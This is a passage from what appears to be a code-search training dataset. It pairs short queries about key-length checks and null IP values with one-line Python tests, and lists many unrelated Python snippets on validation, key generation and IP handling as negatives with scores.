lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def verify_hack_key(self):\r\n\t\tself.percent_english = Dict_Control(self.my_code).check_key()\r\n\t\t#If more than half the words are english, the key will pass. 
\r\n\t\tif self.percent_english > 50:\r\n\t\t\tself.hack_plausible = True", "def test_wrong_total_number_of_keys(self):\n xml = self._make_request()\n request = request_from_xml(xml)\n policy = replace(self.policy, num_different_keys_in_all_bundles=2)\n with self.assertRaises(KSR_POLICY_KEYS_Violation) as exc:\n validate_request(request, policy)\n self.assertEqual(\n \"Unacceptable number of key sets in request test, (1 keys instead of 2)\",\n str(exc.exception),\n )", "def _validate_beneficiary_customer_59A(self, val):\n return val", "def is_perCapita(key):", "def number_keys(a_dictionary):\n return(len(a_dictionary))", "def getNumberOfKeys(self) -> int:\n ...", "def _validate_string_max_length(self, value):\n if self.max_length is not None:\n return len(str(value)) <= self.max_length\n else:\n return True", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def gen_randomkey(length):\n chars = string.letters + string.digits + string.punctuation\n return ''.join([choice(chars) for _ in xrange(int(str(length)))])", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def __len__(self):\n return len(self.token2id)", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def max_length(length):\n def validate(value):\n if len(value) <= length:\n return True\n raise Exception('%s must be at most %s characters long' % length)\n return validate", "def test_kf_id():\n\n for _ in range(1000):\n prefix = ''.join(random.sample(string.ascii_uppercase, 2))\n kf_id = kf_id_generator(prefix)()\n assert kf_id[:2] == prefix\n assert len(kf_id) == 11\n assert kf_id[2] == '_'\n\n assert 'I' not in kf_id[2:]\n assert 'L' not in kf_id[2:]\n assert 'O' not in kf_id[2:]\n assert 'U' not in kf_id[2:]\n\n assert re.search(r'^'+prefix+r'_[A-HJ-KM-NP-TV-Z0-9]{8}', kf_id)", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "async def key(ctx, note:str, length=7):\n if length < 1:\n length = 1\n elif length > 7:\n length = 7\n answer=Tempo.getKeyScale(note)\n solution = 'Next notes in this key is: '+str(answer)\n await ctx.send(solution)", "def validate_length(string):\n if len(string) > 110:\n raise ValidationError('Tweet must be less than 110 characters')", "def __len__(self):\n return 30", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def 
test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def nkeytexts(self):\n return len(self.__keytexts)" ]
[ "0.751583", "0.6865551", "0.6805979", "0.6515183", "0.6490027", "0.64431405", "0.6335833", "0.6305529", "0.6286746", "0.6239916", "0.62253493", "0.61821294", "0.6133636", "0.60966367", "0.605465", "0.6052676", "0.60452414", "0.6023541", "0.6023541", "0.60178965", "0.6007776", "0.5984716", "0.5942965", "0.5936372", "0.58901393", "0.58810353", "0.5879203", "0.5860013", "0.58567125", "0.58461845", "0.5830722", "0.5820042", "0.58124185", "0.57919", "0.5781015", "0.577948", "0.5764639", "0.5755718", "0.5745164", "0.57269174", "0.57257646", "0.57113534", "0.5696706", "0.56907123", "0.5689192", "0.56677204", "0.5650581", "0.56455547", "0.5644738", "0.5642061", "0.5637854", "0.5635847", "0.56290877", "0.5613081", "0.5602815", "0.5600555", "0.55950963", "0.5579142", "0.55695677", "0.5565093", "0.55617213", "0.55581665", "0.5543686", "0.55421937", "0.5536314", "0.5532761", "0.5523976", "0.5512223", "0.55104387", "0.5497835", "0.54976976", "0.54976976", "0.5494962", "0.5492522", "0.5489212", "0.5486875", "0.5486815", "0.54837", "0.547471", "0.546466", "0.5461485", "0.54595494", "0.54507065", "0.54506177", "0.54469705", "0.54453367", "0.54317325", "0.5431137", "0.54283226", "0.5426549", "0.54219586", "0.54191977", "0.54178756", "0.54131234", "0.5412287", "0.54073477", "0.5406114", "0.5402759", "0.5402759", "0.5402691", "0.539592" ]
0.0
-1
Check length of CustomerKey (len= 51)
def test_46(self): assert 'False' == Api.requestBlock('test-46')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def prepKey(key, length):\r\n keyString = \"\"\r\n while len(keyString) < length:\r\n for char in key:\r\n if len(keyString) < length:\r\n keyString += char\r\n return keyString", "def _is_valid_key(self, key):\r\n\r\n # Check the length\r\n if len(key) > 250:\r\n return False\r\n\r\n # Check that there are no spaces or control characters\r\n for char in key:\r\n if ord(char) < 33 or ord(char) == 127:\r\n return False\r\n\r\n return True", "def test_neg_list_size_with_nonexistent_key(self):\n charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'\n minLength = 5\n maxLength = 30\n length = random.randint(minLength, maxLength)\n key = ('test', 'demo', ''.join(map(lambda unused:\n random.choice(charSet),\n range(length))) + \".com\")\n try:\n self.as_connection.list_size(key, \"contact_no\")\n except e.RecordNotFound as exception:\n assert exception.code == 2", "def isValidKey(key):\n return True", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def len12(self, len): # -> None:\n ...", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def check_type( string_key ) : \r\n\r\n if type( string_key ) != 
type( '' ) : \r\n\r\n # raise self.__class__( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n raise Eggog( \"'%s': EGI wants the key to be four _characters_ (not %s) !\" % (type(string_key), ) ) \r\n \r\n else :\r\n \r\n return True", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def generate_key(length):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))", "def _is_size_key (self, key):\n return key == '$size' or key == 'size'", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def _validate_and_split_key(self, key):\n if self._len_keys == 1:\n return self._validate_and_split_len_one(key)\n else:\n return self._validate_and_split_len(key)", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def generate_key( length=10, char_set='all' ):\n\n if char_set == 'digits':\n char_list = string.digits\n elif char_set == 'letters':\n char_list = string.lowercase[:26] + string.uppercase[:26]\n else:\n char_list = good_chars\n\n char_list_limit = len( char_list ) - 1\n\n key = ''\n i = 0\n while i < length:\n key = string.join( [ key , char_list[ random.randint( 0, char_list_limit ) ] ], '' )\n i = i + 1\n\n return key", "def _check_key(self, key):\n raise NotImplementedError", "def generate_randomkey(length):\n chars = string.letters + string.digits\n return ''.join([choice(chars) for i in range(length)])", "def guess_key_length(self, min_len=1, max_len=9, display=False):\n\n res = {}\n max_ic = 0\n probable_key_length = 0\n # We try different key lengths\n for i in range(min_len, max_len+1):\n\n if self._len < i*2:\n continue\n ics = []\n for j in range(i):\n var = []\n for k in range(self._len//i):\n var.append(self._s[k*i + j])\n text = VigenereLikeCipher(''.join(var))\n ics.append(text.get_ic())\n total_ic = round(sum(ics)/len(ics),4)\n if total_ic > max_ic:\n max_ic = total_ic\n probable_key_length = i\n res[i] = total_ic\n if display:\n print \"\\n[+] Visual key length IC correspondance\"\n for k,v in res.items():\n v = int(round(v*1000,0))\n print str(k) + (int(math.floor(math.log10(len(res))))+1-len(str(k)))*\" \",\n print ''.join(['|' for i in range(v//2)])\n print \"\"\n return probable_key_length", "def hstrlen(self, key, field):\n return self._command(b'HSTRLEN', key, field)", "def test_valid_key(self):\n f = lws.valid_data_key\n 
assert f('string', int, r'string') is False\n assert f('string', str, r'test') is False\n assert f(123, int, '123') is False\n assert f(123.00, float, '123') is False\n assert f('123', str, r'[0-9]*') is True", "def check_keys(self):", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def _validate_ordering_customer_50K(self, val):\n return val", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def kem_encapsulated_key_len(self, public_key):\n result = self._lib_vscf_ecc.vscf_ecc_kem_encapsulated_key_len(self.ctx, public_key.c_impl)\n return result", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def generate_api_key(key_length: int = settings.api_app_auth_key_length) -> str:\n return secrets.token_urlsafe(64)[:key_length]", "def _validate_string_min_length(self, value):\n if self.min_length is not None:\n return len(str(value)) >= self.min_length\n else:\n return True", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def checkSize(rsakey, messageSize):\n keySize = key.getKeyLength(rsakey)\n if(keySize >= messageSize):\n return True\n if(keySize < messageSize):\n return False", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def len23(self, len): # -> None:\n ...", "def key_length(self):\n if hasattr(self, '_m_key_length'):\n return self._m_key_length if hasattr(self, '_m_key_length') else None\n\n self._m_key_length = self.rsa_n.length_in_bits\n return self._m_key_length if hasattr(self, '_m_key_length') else None", "def _enforce_txt_record_maxlen(key, value):\n # Add 1 for '=' separator between key and value\n if len(key) + len(value) + 1 > 255:\n # 255 - 3 ('...') - 1 ('=') = 251\n return value[: 251 - len(key)] + \"...\"\n return value", "def test_minmaxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'code': 'AA'}\n self.assertTrue(val.validate(document))\n\n document = {'code': 'A'}\n self.assertFalse(val.validate(document))\n\n document = {'code': 'ABC'}\n self.assertFalse(val.validate(document))", "def _is_valid_key(self, key):\n\t\t\n\t\t# If the key is not a string\n\t\tif not isinstance(key, str):\n\t\t\treturn False\n\t\telse:\n\t\t\tkey = str.upper(key)\n\t\t\n\t\t# If the given key does not match the standard notation XY\n\t\tif len(key) != 2:\n\t\t\treturn False\n\t\t\n\t\t# If the key is out of the board\n\t\tif key[0] not in self.columns or key[1] not in self.rows:\n\t\t\treturn False\n\t\t\n\t\t# Otherwise the key is valid\n\t\treturn True", "def size(self, key):\n return self.cli.passwords.size(key)", "def get_max_key(data):\n return max(map(len, data))", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. 
--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def test_valid_customer(self):\n request = MockRequest()\n\n key_list = list_customer_keys(self._connection, _test_username)\n self.assertEqual(len(key_list), 1)\n key_id, key_value = key_list[0]\n\n authentication_string = compute_authentication_string(\n key_id,\n key_value,\n _test_username,\n _test_method,\n current_timestamp(),\n _test_uri\n )\n request.__dict__[\"authorization\"] = authentication_string.split()\n request.__dict__[\"method\"] = _test_method\n request.__dict__[\"headers\"] = {\n 'x-nimbus-io-timestamp' : str(current_timestamp())\n } \n request.__dict__[\"path_qs\"] = _test_uri\n\n authenticator = SqlAuthenticator()\n authenticated = authenticator.authenticate(\n self._connection, _test_username, request\n )\n self.assertTrue(authenticated)", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def _validate_beneficiary_customer_59A(self, val):\n return val", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def is_perCapita(key):", "def number_keys(a_dictionary):\n return(len(a_dictionary))", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def __len__(self):\n return self.cli.passwords.len()", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. 
Chain IDs should have only one character.\"\n )", "def str_len():\n strlen_dict = {}\n # Length of ion name\n strlen_dict['ion'] = 6\n # Length of data file name for line source\n strlen_dict['Source'] = 30\n # Return\n return strlen_dict", "def __len__(self):\n return len(self._key_order)", "def test_utils_random_string(self, tcex, string_length):\n result = tcex.utils.random_string(string_length=string_length)\n assert (\n len(result) == string_length\n ), f'The length of the string {len(result)} != {string_length}'", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def getNumberOfKeys(self) -> int:\n ...", "def make_random_key(length=RANDOM_KEY_LENGTH, chars=RANDOM_KEY_CHARACTERS):\n chars = [random.choice(chars) for _ in range(length)]\n return ''.join(chars)", "def validate_key(self, key: keyType) -> bool:\n if isinstance(key, (dict,bool)):\n raise Exception\n if key is None:\n raise Exception\n # Numerical key object has no len(),\n # so explicitly specify which types are not allowed to use empty value as keys\n if isinstance(key, (str, tuple, set, list)) and (len(key) == 0):\n raise Exception\n return True", "def get_dict_data_len(x_dict: Dict[Any, Collection]):\n return check_all_same_length(*x_dict.values())", "def __len__(self):\n\t\treturn 8", "def __len__(self):\n return len(self.token2id)", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def field_length(self,\r\n entrylist=None):\r\n\r\n\r\n if entrylist is None:\r\n entrylist = list(self.default_dict['field'].keys())\r\n maxlength = 0\r\n for i_temp in entrylist:\r\n if len(self.default_dict['field'][i_temp]) > maxlength:\r\n maxlength = len(self.default_dict['field'][i_temp])\r\n return maxlength", "def random_key(size):\n return ''.join(random.choice(string.letters) for _ in range(size))", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def _GetKeyString(self):", "def _GetKeyString(self):", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def generate_key(length, choices=None):\n if choices is None:\n choices = (\n string.ascii_lowercase +\n string.ascii_uppercase +\n string.digits\n )\n\n return ''.join(random.choice(choices) for x in xrange(length))", "def 
verify_hack_key(self):\r\n\t\tself.percent_english = Dict_Control(self.my_code).check_key()\r\n\t\t#If more than half the words are english, the key will pass. \r\n\t\tif self.percent_english > 50:\r\n\t\t\tself.hack_plausible = True", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def password_min_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"password_min_length\")", "def validate_kf_id(kf_id, prefix='TA'):\n if len(kf_id) != 11 or kf_id[:3] != prefix+'_':\n abort(400, f\"'{kf_id}' is not a valid kf_id\")", "def test_wrong_total_number_of_keys(self):\n xml = self._make_request()\n request = request_from_xml(xml)\n policy = replace(self.policy, num_different_keys_in_all_bundles=2)\n with self.assertRaises(KSR_POLICY_KEYS_Violation) as exc:\n validate_request(request, policy)\n self.assertEqual(\n \"Unacceptable number of key sets in request test, (1 keys instead of 2)\",\n str(exc.exception),\n )", "def getAuthKey(self):\r\n auth_key = 'Que despierte la Red'\r\n assert len(auth_key) == self.AUTH_KEY_LEN\r\n return auth_key", "def test_kf_id():\n\n for _ in range(1000):\n prefix = ''.join(random.sample(string.ascii_uppercase, 2))\n kf_id = kf_id_generator(prefix)()\n assert kf_id[:2] == prefix\n assert len(kf_id) == 11\n assert kf_id[2] == '_'\n\n assert 'I' not in kf_id[2:]\n assert 'L' not in kf_id[2:]\n assert 'O' not in kf_id[2:]\n assert 'U' not in kf_id[2:]\n\n assert re.search(r'^'+prefix+r'_[A-HJ-KM-NP-TV-Z0-9]{8}', kf_id)", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def check_empty_key(self, key):\n if key is None or key == \"\" or key == self.empty_api_key:\n print(\"ERROR, A KEY IS EMPTY - CHECK YOUR FILE\")\n return False\n return True", "def nkeytexts(self):\n return len(self.__keytexts)", "def nkeytexts(self):\n return len(self.__keytexts)" ]
[ "0.7524419", "0.68488765", "0.6717122", "0.65168095", "0.6435481", "0.6403643", "0.63951415", "0.63328946", "0.62844515", "0.6251781", "0.6235365", "0.61816084", "0.6115362", "0.6111987", "0.6067936", "0.6057888", "0.60268646", "0.60186607", "0.60172915", "0.59633636", "0.59628296", "0.5928509", "0.59246284", "0.59246284", "0.59189224", "0.5902894", "0.5885312", "0.58551323", "0.5849002", "0.5838142", "0.5798352", "0.57918406", "0.5728898", "0.5726331", "0.5723914", "0.57221663", "0.57172686", "0.57024205", "0.5689582", "0.5682899", "0.56793076", "0.56686944", "0.56650174", "0.5663552", "0.5661435", "0.56282675", "0.5627651", "0.5613829", "0.5611821", "0.5603955", "0.559567", "0.55916226", "0.55882776", "0.5554245", "0.5542103", "0.55401826", "0.5534854", "0.5532206", "0.55265456", "0.55232435", "0.55214024", "0.5511582", "0.55054086", "0.5503353", "0.5498173", "0.5494202", "0.54831994", "0.547872", "0.5478519", "0.5477827", "0.5477197", "0.54752624", "0.54733056", "0.54688126", "0.54679406", "0.54611456", "0.5451337", "0.54478604", "0.54469514", "0.54399425", "0.5436256", "0.54205364", "0.54170454", "0.5416918", "0.5416918", "0.5413427", "0.5413427", "0.54133856", "0.5411284", "0.54037994", "0.54029834", "0.54018235", "0.54018235", "0.5399204", "0.53987443", "0.53818613", "0.5379787", "0.5379552", "0.5378111", "0.5376278", "0.5376278" ]
0.0
-1
Send null value in IP
def test_47(self): assert 'False' == Api.requestBlock('test-47', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_noop(self):\n self.assertFalse(helpers.getBcastAddrforIPv4())\n self.assertIsNone(helpers.no_op())", "def ip_white(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_white\")", "def ip_white(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_white\")", "def send_nop(self):\n if not self.connected(): return\n try:\n self.wlock.acquire()\n nop = telnetlib.IAC + telnetlib.NOP\n if self.verbose:\n self.tn.msg(\"send %r\", nop)\n self.tn.sock.sendall(nop) # write() doubles IAC, so use sendall\n finally:\n self.wlock.release()", "def __init__(self) -> None:\n self.ip_address: str | None = None", "def test_init_no_ip(self):\n client = ClientInfo(\"cc:cc:cc:cc:cc:cc\", ip=None, ap_info=self.ap)\n self.assertEqual(client.ip, None)\n self.assertEqual(client.ip_bytes, None)", "def _load_ip_addr():\n IPAddr = session.get('IPAddr')\n\n if IPAddr is None:\n g.IPAddr = None\n else:\n g.IPAddr = IPAddr", "def ip(self) -> Optional[str]:\n return pulumi.get(self, \"ip\")", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def ip_address(self, obj):\n if obj.node.ip_address:\n return obj.node.ip_address\n return None", "def local_ip(self) -> Optional[str]:\n if not self._send_parse_reply(b\"AT+IPADDR\", b\"+IPADDR:\"):\n return None\n return self._buf", "def JP_V0_addr(self, addr):\n\t\tself.IP = addr + self.V[0]", "def get_ip(self):", "def send_noop():\n send_command(0xE3)", "def ip_white(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_white\")", "async def test_gateway_empty_string(\n ip4config_service: IP4ConfigService, dbus_session_bus: MessageBus\n):\n ip4 = IpConfiguration(\"/org/freedesktop/NetworkManager/IP4Config/1\", ip4=True)\n await ip4.connect(dbus_session_bus)\n\n ip4config_service.emit_properties_changed({\"Gateway\": \"\"})\n await ip4config_service.ping()\n assert ip4.gateway is None", "def test_empty(self):\n self.assertFalse(isIPv6Address(\"\"))", "def none_to_empty(data):\n return data if data is not None else ''", "def no_transport(data, affected_points):\n return", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def JP_addr(self, addr):\n\t\tself.IP = addr", "def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol", "def test_address_empty(self):\n tester = app.test_client(self)\n response = tester.post(\"/result\",\n data = dict(location =\"\"),\n follow_redirects = True)\n self.assertIn(b\"Null input\", response.data)", "def ip_not(self, ip_not):\n\n self._ip_not = ip_not", "def set_deafult_gw(self, args):\n\n 
gw_ip = ip_address(args.ip)\n gw_info = UplinkGatewayInfo()\n gw_info.update_ip(str(gw_ip))\n print(\"set Default gw IP to %s\" % gw_info.get_gw_ip())", "def convert_nil(self, v, t):\n assert len(v) == 0\n return None", "def setIpaddr(self):\n\t\tself.ipaddr = self.settings.getKeyValue('ipaddr')\n\t\tself.socket.send('setenv ipaddr ' + self.ipaddr+'\\r', 1)\t\t\n\t\treturn None", "def sendPing(self, payload=None):", "def spoof_packet(packet):", "def silent_none(value):\n if value is None:\n return ''\n return value", "def sticky_option(ctx, param, value):\n if value:\n return 'SOURCE_IP'\n return None", "def nullValueToNan(self) -> None:\n self.cpp.nullValueToNan()", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address\")", "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def server_zero():\n return intrinsics.federated_value(0, placements.SERVER)", "def signup_ip(obj):\n try:\n return 